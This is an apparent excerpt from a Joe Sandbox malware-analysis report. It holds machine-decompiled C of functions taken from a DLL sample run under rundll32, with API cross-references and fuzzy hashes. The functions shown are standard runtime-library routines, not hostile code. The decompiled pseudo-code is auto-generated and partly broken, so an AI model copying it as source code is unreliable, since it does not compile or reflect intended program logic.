Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: 91162103ee285ac8f16726a183547f732284b545e3a23eb7035474981c366609
Instruction ID: 666fdedf627e1b61233f41cd9895a592b23949222c27b88d28614513ed27c2f0
Opcode Fuzzy Hash: 91162103ee285ac8f16726a183547f732284b545e3a23eb7035474981c366609
Instruction Fuzzy Hash: DA01D234204786BAEB20EB21AC45B5EBBE9EF12790F154529F902DE4F1CB70ECD2C550

Uniqueness

Uniqueness Score: -1.00%

Function 10021590 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10021590(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t18;
				void* _t21;

				E100286A3(0xc);
				_push(E10027DD4);
				_t21 = E10028345(0x10039b44);
				if( *(_t21 + 8) != 0) {
					L5:
					E10028706(0xc);
					return  *(_t21 + 8)(_v4, _v0, _a4, _a8);
				}
				_t16 = LoadLibraryA("hhctrl.ocx");
				 *(_t21 + 4) = _t16;
				if(_t16 == 0) {
					L4:
					return 0;
				}
				_t18 = GetProcAddress(_t16, "HtmlHelpA");
				 *(_t21 + 8) = _t18;
				if(_t18 != 0) {
					goto L5;
				}
				FreeLibrary( *(_t21 + 4));
				 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
				goto L4;
			}

APIs

Part of subcall function 100286A3: EnterCriticalSection.KERNEL32(10039ED4,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286D1
Part of subcall function 100286A3: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286E3
Part of subcall function 100286A3: LeaveCriticalSection.KERNEL32(10039ED4,?,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772), ref: 100286EC
Part of subcall function 100286A3: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,10028366,00000010,00000000,?,?,?,?,1002776C,1002771F,100272A4,10027772,1001E169), ref: 100286FE

Part of subcall function 10028345: __EH_prolog.LIBCMT ref: 1002834A

LoadLibraryA.KERNEL32(hhctrl.ocx,10027DD4,0000000C), ref: 100215B4
GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100215C7
FreeLibrary.KERNEL32(?), ref: 100215D7

Strings

hhctrl.ocx, xrefs: 100215AF
HtmlHelpA, xrefs: 100215C1

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLibrary$AddressFreeH_prologInitializeLeaveLoadProc
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 813623328-63838506
Opcode ID: 1f57122c41e22f1512c22e29d2660511fa21ff2bc27e04bc50b0fdc27a2b92ac
Instruction ID: 4312be458f97f88f2422cb1c6e4f687e9245a7cfbc3bf02053808be942678b0a
Opcode Fuzzy Hash: 1f57122c41e22f1512c22e29d2660511fa21ff2bc27e04bc50b0fdc27a2b92ac
Instruction Fuzzy Hash: FDF0C239405B12DFD721DF60ED49F4A7BE0EF44741F404858F147A5460DB30E9049B21

Uniqueness

Uniqueness Score: -1.00%

Function 10011AAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10011AAB(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}

0x10011ab0
0x10011ab8
0x10011ac0
0x10011ac8
0x10011ace
0x10011ace
0x10011ac8
0x10011ad4

APIs

GetModuleHandleA.KERNEL32(mscoree.dll,10011C19,?,1002E870,00000008,10011C3F,?,00000001,00000000,100172D9,00000003), ref: 10011AB0
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011AC0
ExitProcess.KERNEL32 ref: 10011AD4

Strings

CorExitProcess, xrefs: 10011ABA
mscoree.dll, xrefs: 10011AAB

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: c0356d4db37c8cf768eb70992d152702753b58a0521905386c10f19f44868b62
Instruction ID: e94fd4e95ff06cc3c52a799842b6ddcd47d5a2a8c6c61059b5387d74fce0c726
Opcode Fuzzy Hash: c0356d4db37c8cf768eb70992d152702753b58a0521905386c10f19f44868b62
Instruction Fuzzy Hash: 48D0C930240B91EBEB05ABA29E48A5E3BA8FF407C1B910428F54AD4830DF30DC45AA12

Uniqueness

Uniqueness Score: -1.00%

Function 10029903 Relevance: 7.7, APIs: 5, Instructions: 236
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E10029903(intOrPtr __ecx, intOrPtr __edx) {
				CHAR* _t94;
				void* _t100;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t114;
				void* _t116;
				void* _t117;
				void* _t120;
				signed short _t123;
				signed int _t125;
				signed int _t128;
				void* _t134;
				char _t140;
				CHAR* _t144;
				intOrPtr* _t147;
				void* _t149;
				void* _t151;
				intOrPtr _t153;
				signed short* _t156;
				void* _t157;
				CHAR* _t159;
				int _t161;
				char* _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				CHAR* _t171;
				char* _t174;
				CHAR* _t182;

				_t153 = __edx;
				_t148 = __ecx;
				E10011A8C(E1002AEBF, _t168);
				_t171 = _t170 - 0x2c;
				_t144 =  *(_t168 + 8);
				_t94 = _t144[8];
				 *(_t168 - 0x10) = _t171;
				 *((intOrPtr*)(_t168 - 0x20)) = __ecx;
				 *(_t168 - 0x11) = 0;
				 *(_t168 + 8) = _t94;
				if(_t94 == 0) {
					 *(_t168 + 8) = _t168 - 0x11;
				}
				_t161 = lstrlenA( *(_t168 + 8));
				 *(_t168 - 0x18) = _t144[0x10];
				 *(_t168 - 0x1c) = _t144[0xc];
				if(( *(_t168 + 0xc) & 0x0000000c) == 0) {
					L7:
					_t145 =  *(_t168 + 0x14);
					_t100 = E10006CE0(_t148, ( *(_t168 + 0x14))[8] << 4);
					_pop(_t149);
					if(_t100 == 0) {
						L9:
						_t101 = 0x8007000e;
						L47:
						 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
						return _t101;
					}
					E100116D0((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
					 *(_t168 - 0x10) = _t171;
					 *(_t168 + 0xc) = _t171;
					E10012400( *(_t168 + 0xc), 0, _t145[8] << 4);
					_t174 =  &(_t171[0xc]);
					_t156 = E10029668( *(_t168 + 8),  *(_t168 - 0x1c));
					_t38 =  &(_t156[8]); // 0x10
					_t165 = _t38;
					_t108 = E10006CE0(_t149, _t38);
					_pop(_t151);
					if(_t108 != 0) {
						E100116D0( &(_t165[1]) & 0xfffffffc, _t151);
						 *(_t168 - 0x10) = _t174;
						_t166 = _t174;
						_t114 = E100296AA( *((intOrPtr*)(_t168 - 0x20)), _t166,  *(_t168 + 8), _t168 - 0x34,  *(_t168 - 0x1c), _t145,  *((intOrPtr*)(_t168 + 0x18)),  *(_t168 + 0xc));
						_t147 = 0;
						 *((intOrPtr*)(_t168 + 0x18)) = _t114;
						if(_t114 != 0) {
							L17:
							_t166 =  *(_t168 + 0x14);
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							_t157 = 0;
							if(_t166[8] <= 0) {
								L20:
								_t101 =  *((intOrPtr*)(_t168 + 0x18));
								if(_t101 != 0) {
									goto L47;
								}
								_t156 =  *(_t168 + 0x10);
								if(_t156 == 0) {
									_t116 = ( *(_t168 - 0x1c) & 0x0000ffff) - 8;
									if(_t116 == 0) {
										if(_t147 != 0) {
											__imp__#6(_t147);
										}
										L46:
										_t101 = 0;
										goto L47;
									}
									_t117 = _t116 - 1;
									if(_t117 == 0) {
										L41:
										if(_t147 != 0) {
											 *((intOrPtr*)( *_t147 + 8))(_t147);
										}
										goto L46;
									}
									_t120 = _t117 - 3;
									if(_t120 == 0) {
										__imp__#9(_t168 - 0x34);
										goto L46;
									}
									if(_t120 != 1) {
										goto L46;
									}
									goto L41;
								}
								_t123 =  *(_t168 - 0x1c);
								 *_t156 = _t123;
								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
								if(_t125 > 0x13) {
									goto L46;
								}
								switch( *((intOrPtr*)(_t125 * 4 +  &M10029BC9))) {
									case 0:
										L35:
										 *(__edi + 8) = __bx;
										goto L46;
									case 1:
										 *(__edi + 8) = __ebx;
										goto L46;
									case 2:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 3:
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 4:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										__eax =  *(__ebp - 0x30);
										 *(__edi + 0xc) =  *(__ebp - 0x30);
										goto L46;
									case 5:
										__ebx =  ~__ebx;
										asm("sbb ebx, ebx");
										goto L35;
									case 6:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L46;
									case 7:
										goto L46;
									case 8:
										 *(__edi + 8) = __bl;
										goto L46;
								}
							}
							do {
								__imp__#9( *(_t168 + 0xc));
								 *(_t168 + 0xc) =  &(( *(_t168 + 0xc))[0x10]);
								_t157 = _t157 + 1;
							} while (_t157 < _t166[8]);
							goto L20;
						}
						_t128 =  *(_t168 - 0x1c) & 0x0000ffff;
						 *(_t168 - 4) = 0;
						if(_t128 == 4) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1002A4DA();
							 *(_t168 + 8) = _t182;
							 *(_t168 - 0x34) =  *(_t168 + 8);
							goto L17;
						}
						if(_t128 == 5) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1002A4DA();
							asm("fst qword [ebp-0x24]");
							L27:
							 *(_t168 - 0x34) = _t182;
							goto L17;
						}
						if(_t128 == 7) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1002A4DA();
							asm("fst qword [ebp-0x24]");
							goto L27;
						}
						if(_t128 <= 0x13 || _t128 > 0x15) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							_t147 = E1002A4DA();
						} else {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							 *(_t168 - 0x34) = E1002A4DA();
							 *((intOrPtr*)(_t168 - 0x30)) = _t153;
						}
						goto L17;
					}
					goto L9;
				}
				_t17 = _t161 + 3; // 0x3
				_t158 = _t17;
				_t134 = E10006CE0(_t148, _t17);
				_pop(_t148);
				if(_t134 == 0) {
					goto L9;
				}
				E100116D0(_t158 + 0x00000003 & 0xfffffffc, _t148);
				 *(_t168 - 0x10) = _t171;
				_t159 = _t171;
				E10011CC0(_t159,  *(_t168 + 8), _t161);
				_t140 = _t144[0xc];
				_t171 =  &(_t171[0xc]);
				 *(_t168 + 8) = _t159;
				if(_t140 == 8) {
					_t140 = 0xe;
				}
				_t159[_t161] = 0xff;
				_t167 = _t161 + 1;
				 *(_t168 - 0x1c) =  *(_t168 - 0x1c) & 0x00000000;
				_t159[_t167] = _t140;
				_t159[_t167 + 1] = 0;
				 *(_t168 - 0x18) = _t144[0x14];
				goto L7;
			}

APIs

__EH_prolog.LIBCMT ref: 10029908
lstrlenA.KERNEL32(?,?,00000000), ref: 10029933
VariantClear.OLEAUT32(0000000C), ref: 10029A8F

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClearH_prologVariantlstrlen
String ID:
API String ID: 2416264355-0
Opcode ID: 4469b95eb921fd0463e6dea2447178b2bccff52566afd474d474e568cc894508
Instruction ID: 6ab4ae10c4a3f7f29aa082c0c5d1e6c41eb83bf1ed1b9d6822d3df0f95aa23ce
Opcode Fuzzy Hash: 4469b95eb921fd0463e6dea2447178b2bccff52566afd474d474e568cc894508
Instruction Fuzzy Hash: A4819E3590061AEBCF11CFA8E981AAEBBB0FF052D4F608159FC54AB250D731E991DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 10018F3F Relevance: 7.7, APIs: 5, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10018F3F(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E100142F3(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E10013440(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E10013400(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E10013400(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E10013440(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E10013400(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x10037c18;
										if(_v12 == 0) {
											_t159 = 0x10037c4c;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E10013440( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E10013440(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E10013400(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E10013440(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E10011233(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x1003a4e0;
						goto L10;
					}
				}
			}

APIs

Part of subcall function 100142F3: GetLastError.KERNEL32(?,00000000,10013373,10014CA0,00000000,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010,100144CB), ref: 100142F5
Part of subcall function 100142F3: FlsGetValue.KERNEL32(?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?,1002E838), ref: 10014303
Part of subcall function 100142F3: FlsSetValue.KERNEL32(00000000,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?), ref: 1001432A
Part of subcall function 100142F3: GetCurrentThreadId.KERNEL32 ref: 10014342
Part of subcall function 100142F3: SetLastError.KERNEL32(00000000,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?), ref: 10014359

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018FB1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100190AE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10019107
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10019124
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10019147

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
String ID:
API String ID: 223281555-0
Opcode ID: 6ff7ea67268cc61001d86e24f94c4ddf6451e47b913e42406bab9b5f02c4bb20
Instruction ID: 383c94443e27b0158f879f520f0c2ae8f7135cb71ab7b3e58b1ef996f7e1f60c
Opcode Fuzzy Hash: 6ff7ea67268cc61001d86e24f94c4ddf6451e47b913e42406bab9b5f02c4bb20
Instruction Fuzzy Hash: 31610576A00306AFE715CF99CC41B9AB3F6FB88764F21812DF6009F281D775E9808B10

Uniqueness

Uniqueness Score: -1.00%

Function 1001650B Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001650B(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x1003a350; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x1003a398, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x1003a350; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x1003a398, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x1003a350 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x1003a358 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x1003a354 + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1003a358 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1003a358 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x1003a398, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1003a358 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x1003a358 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x1003a398, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x1003a358 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x1003a350; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x1003a350 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x1003a358 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1003a358 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,100115FD,?), ref: 100165BE
InterlockedExchange.KERNEL32(1003A398,00000001), ref: 1001663C
InterlockedExchange.KERNEL32(1003A398,00000000), ref: 100166A1
InterlockedExchange.KERNEL32(1003A398,00000001), ref: 100166C5
InterlockedExchange.KERNEL32(1003A398,00000000), ref: 10016725

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

